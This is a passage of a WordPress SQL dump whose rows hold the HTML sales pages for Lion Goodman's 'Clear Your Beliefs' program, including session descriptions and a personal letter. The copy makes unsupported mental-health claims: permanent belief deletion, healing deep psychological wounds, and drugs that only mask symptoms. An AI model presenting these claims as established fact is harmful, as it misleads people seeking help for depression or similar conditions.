the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;"><a href="http://www.clearbeliefs.com" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="__blank"> Learn About the Practitioner Training</a></p>\n\n© Copyright 2014 by Lion Goodman', 'CYB Home - Clear your Beliefs - use this', '', 'inherit', 'open', 'open', '', '1450-revision-v1', '', '', '2015-07-08 00:25:21', '2015-07-08 05:25:21', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2166, 2, '2015-05-12 12:53:05', '2015-05-12 17:53:05', '&nbsp;			<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n&nbsp;\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><a class="big button blue" href="http://clearyourbeliefs.com/program/#package">Okay, I''m convinced!Take me to the program description,tell me about all the cool bonuses I''ll get,and how much it costs...</a></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\nThe best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" />\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n&nbsp;\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a>Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.\n\n<strong>We literally create our reality with our beliefs.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn''t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n\n<strong><em>I''m not enough.</em></strong>\n<strong><em>I can''t do it.</em></strong>\n<strong><em>I''m not worthy.</em></strong>\n<strong><strong><em>I''ll never be like them.</em></strong></strong>\n<strong><em>I''m all alone.</em></strong>\n\n<strong><em>I need to do more (or better) to be accepted.</em></strong>\n<strong><em>There''s something wrong with me.</em></strong>\n<strong><em>I''m fundamentally flawed.</em></strong>\n<strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong>\n<strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong>\n\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong>Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong>\n\n<strong>It''s that simple.</strong></p>\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong>and</strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<p><strong> It''s that simple.</strong></p>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p>\n\n<p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p>\n\n<p>\nWhy did I say that?\nWhat''s wrong with me?\nWhy didn''t I follow through?\nWhy did I react that way?\nWhat the hell just happened?\n</p>\n<em>\n<p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p><p><strong>Here''s why:</strong></p>\n\n<strong>Affirmations</strong> are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.\n<strong>That Belief Isn''t True.</strong>  Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.\n<strong>Tap Your Problem Away. </strong> Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.\n\n<p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n\n<strong><strong><strong>First: It''s not your fault. There''s nothing wrong with you.</strong></strong></strong>\n<strong>Second: You can change your beliefs <em>permanently</em>.</strong>\n\n<p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p>\n\n<p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n<h1>Imagine The Life You Desire</h1>\n<p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n<p>You''re no longer held back by old beliefs and stories.</p>\n<p>There''s no resistance to doing what needs to be done.</p>\n<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n\nEliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.\nRemove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.\nGive you the power to change your experiences – and your circumstances – at will.\nShow you how to gain mastery over your moods, perceptions, and responses.\n\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p>\n\n<p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p>\n\n<p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p>\n\n<p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p>\n\n<h1>With This Methodology, You Can Finally:</h1>\n\nManifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a>\nRemove resistance and barriers\nOpen doors to new opportunities\nEliminate pain and suffering from the past\nExperience more fulfillment in your relationships\nAttract more abundance and prosperity\nIncrease your energy, vitality, and productivity\n\n<p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p>\n\n&nbsp;\n\n<h1>A Message from Lion Goodman...</h1>\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n<p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p>\n\n&nbsp;\n\n<h5>Session 1:   <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n<strong> In Session 1, you will:</strong>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<strong> In Session 2, you will:</strong>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<strong> In Session 3, you will:</strong>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n&nbsp;\n\n<strong> In Session 4, you will:</strong>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" 